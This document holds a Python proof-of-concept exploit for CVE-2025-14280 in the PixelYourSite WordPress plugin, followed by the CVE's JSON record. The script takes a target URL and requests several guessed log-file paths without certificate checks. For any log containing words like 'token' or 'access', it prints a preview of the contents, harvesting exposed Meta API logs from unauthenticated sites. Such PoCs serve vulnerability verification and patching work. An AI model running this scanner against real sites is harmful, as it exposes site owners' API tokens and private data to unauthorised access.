CVE-2025-14280

# CVE-2025-14280 PoC - PixelYourSite Sensitive Information Exposure # Target: WordPress sites with PixelYourSite plugin # Condition: Meta API logs setting must be enabled import requests import sys from urllib.parse import urljoin def check_vulnerability(target_url): """ Check if PixelYourSite plugin exposes sensitive log files """ # Common log file paths used by PixelYourSite log_paths = [ "/wp-content/uploads/pixelyoursite/logs/meta-api.log", "/wp-content/uploads/pys_logs/meta-api.log", "/wp-content/plugins/pixelyoursite/includes/logger/logs/meta-api.log", "/wp-content/uploads/2025/01/meta-api.log", "/wp-content/uploads/pixelyoursite/meta-api.log" ] print(f"[*] Scanning target: {target_url}") print(f"[*] Looking for exposed PixelYourSite log files...\n") found_logs = [] for log_path in log_paths: full_url = urljoin(target_url, log_path) try: response = requests.get(full_url, timeout=10, verify=False) if response.status_code == 200 and len(response.content) > 0: # Check if response contains log-like content content = response.text if any(keyword in content.lower() for keyword in ['meta', 'api', 'token', 'pixel', 'access']): print(f"[!] VULNERABLE: {full_url}") print(f" Status: {response.status_code}") print(f" Content length: {len(content)} bytes") found_logs.append({ 'url': full_url, 'status': response.status_code, 'size': len(content) }) # Display first 500 characters of log content print(f" Preview:\n{content[:500]}\n") except requests.RequestException as e: print(f"[-] Error accessing {full_url}: {e}") if not found_logs: print("[*] No exposed log files found (or Meta API logs is disabled)") return False return True if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python poc.py <target_url>") print("Example: python poc.py http://example.com/") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

{"cve": {"id": "CVE-2025-14280", "sourceIdentifier": "[email protected]", "published": "2025-12-29T19:15:54.870", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The PixelYourSite plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 11.1.5 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files, when the \"Meta API logs\" setting is enabled (disabled by default). The vulnerability was partially patched in version 11.1.5 and fully patched in version 11.1.5.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/pixelyoursite/tags/11.1.4.2/includes/logger/class-pys-logger.php#L118", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3416113/pixelyoursite", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3424175/pixelyoursite", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0fe77926-8a43-42ce-9d3d-3aac2334dcbd?source=cve", "source": "[email protected]"}]}}